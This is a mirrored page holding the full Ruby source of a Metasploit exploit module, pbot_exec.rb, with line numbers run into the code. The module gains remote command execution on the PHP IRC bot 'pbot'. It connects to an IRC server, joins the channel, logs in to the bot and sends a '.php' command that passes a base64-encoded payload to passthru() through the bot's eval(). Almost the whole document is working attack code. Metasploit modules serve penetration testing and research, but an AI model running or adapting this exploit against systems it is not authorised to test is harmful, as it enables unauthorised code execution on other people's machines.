CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/misc/pbot_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'PHP IRC Bot pbot eval() Remote Code Execution',13'Description' => %q{14This module allows remote command execution on the PHP IRC bot pbot by abusing15the usage of eval() in the implementation of the .php command. In order to work,16the data to connect to the IRC server and channel where find pbot must be provided.17The module has been successfully tested on the version of pbot analyzed by Jay18Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP19SP3.20},21'Author' =>22[23'evilcry', # pbot analysis'24'Jay Turla', # pbot analysis25'bwall', # aka @bwallHatesTwits, PoC26'juan vazquez' # Metasploit module27],28'License' => MSF_LICENSE,29'References' =>30[31[ 'OSVDB', '84913' ],32[ 'EDB', '20168' ],33[ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/']34],35'Platform' => %w{ unix win },36'Arch' => ARCH_CMD,37'Payload' =>38{39'Space' => 344, # According to RFC 2812, the max length message is 512, including the cr-lf40'BadChars' => '',41'DisableNops' => true,42'Compat' =>43{44'PayloadType' => 'cmd',45}46},47'Targets' =>48[49[ 'pbot', { } ]50],51'Privileged' => false,52'DisclosureDate' => '2009-11-02',53'DefaultTarget' => 0))5455register_options(56[57Opt::RPORT(6667),58OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),59OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),60OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']),61OptString.new('PBOT_PASSWORD', [false, 'pbot Password', ''])62])63end6465def post_auth?66true67end6869def check70connect7172response = register(sock)73if response =~ /463/ or response =~ /464/74vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")75return Exploit::CheckCode::Unknown76end7778response = join(sock)79if not response =~ /353/ and not response =~ /366/80vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")81return Exploit::CheckCode::Unknown82end83response = pbot_login(sock)84quit(sock)85disconnect8687if response =~ /auth/ and response =~ /logged in/88return Exploit::CheckCode::Vulnerable89else90return Exploit::CheckCode::Safe91end92end9394def send_msg(sock, data)95sock.put(data)96data = ""97begin98read_data = sock.get_once(-1, 1)99while not read_data.nil?100data << read_data101read_data = sock.get_once(-1, 1)102end103rescue EOFError104end105data106end107108def register(sock)109msg = ""110111if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?112msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"113end114115if datastore['NICK'].length > 9116nick = rand_text_alpha(9)117print_error("The nick is longer than 9 characters, using #{nick}")118else119nick = datastore['NICK']120end121122msg << "NICK #{nick}\r\n"123msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"124125response = send_msg(sock,msg)126return response127end128129def join(sock)130join_msg = "JOIN #{datastore['CHANNEL']}\r\n"131response = send_msg(sock, join_msg)132return response133end134135def pbot_login(sock)136login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login"137if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty?138login_msg << " #{datastore['PBOT_PASSWORD']}"139end140login_msg << "\r\n"141response = send_msg(sock, login_msg)142return response143end144145def pbot_command(sock)146encoded = Rex::Text.encode_base64(payload.encoded)147command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n"148response = send_msg(sock, command_msg)149return response150end151152def quit(sock)153quit_msg = "QUIT :bye bye\r\n"154sock.put(quit_msg)155end156157def exploit158connect159160print_status("#{rhost}:#{rport} - Registering with the IRC Server...")161response = register(sock)162if response =~ /463/ or response =~ /464/163print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")164return165end166167print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")168response = join(sock)169if not response =~ /353/ and not response =~ /366/170print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")171return172end173174print_status("#{rhost}:#{rport} - Registering with the pbot...")175response = pbot_login(sock)176if not response =~ /auth/ or not response =~ /logged in/177print_error("#{rhost}:#{rport} - Error registering with the pbot")178return179end180181print_status("#{rhost}:#{rport} - Exploiting the pbot...")182pbot_command(sock)183184quit(sock)185disconnect186end187end188189190